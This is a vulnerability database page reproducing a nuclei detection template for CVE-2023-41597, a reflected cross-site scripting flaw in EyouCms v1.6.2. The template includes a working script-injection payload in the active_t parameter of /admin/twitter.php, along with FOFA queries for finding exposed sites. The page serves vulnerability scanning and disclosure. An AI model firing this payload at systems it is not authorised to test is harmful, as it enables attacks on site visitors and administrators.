Lucene search
K

EyouCms v1.6.2 - Cross-Site Scripting

🗓️ 29 Jun 2026 05:52:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

EyouCms v1.6.2 - Reflected XSS vulnerability in admin/twitter.ph

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-41597
15 Nov 202306:15
attackerkb
CNNVD
EyouCms Cross-Site Scripting Vulnerability
15 Nov 202300:00
cnnvd
CVE
CVE-2023-41597
15 Nov 202300:00
cve
Cvelist
CVE-2023-41597
15 Nov 202300:00
cvelist
NVD
CVE-2023-41597
15 Nov 202306:15
nvd
OSV
CVE-2023-41597
15 Nov 202306:15
osv
Prion
Cross site scripting
15 Nov 202306:15
prion
RedhatCVE
CVE-2023-41597
23 May 202504:17
redhatcve
Vulnrichment
CVE-2023-41597
15 Nov 202300:00
vulnrichment
id: CVE-2023-41597

info:
  name: EyouCms v1.6.2 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    EyouCms v1.6.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /admin/twitter.php?active_t.
  impact: |
    Allows attackers to execute malicious scripts in the context of a victim's browser session.
  remediation: |
    Implement proper input validation and output encoding to prevent XSS attacks.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-41597
    cwe-id: CWE-79
    epss-score: 0.01224
    epss-percentile: 0.65028
    cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: eyoucms
    product: eyoucms
    fofa-query:
      - icon_hash="-614262549"
      - title="eyoucms"
  tags: cve,cve2023,eyoucms,xss,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: word
        part: body
        words:
          - 'eyoucms'
          - 'ey_fleshVerify'
        condition: or
        internal: true
        case-insensitive: true

  - method: GET
    path:
      - "{{BaseURL}}/admin/twitter.php?active_t=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402206dfd75867f1fa87f0795ee52d2eeaee710d697dd97e46db3707cf7ad6a81c68d02206dc395b0628aaf33437262bfa6ca007daf61a5a0ccc4cb44f3be1a8dc2db3720:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.16.1
EPSS0.01224
SSVC
20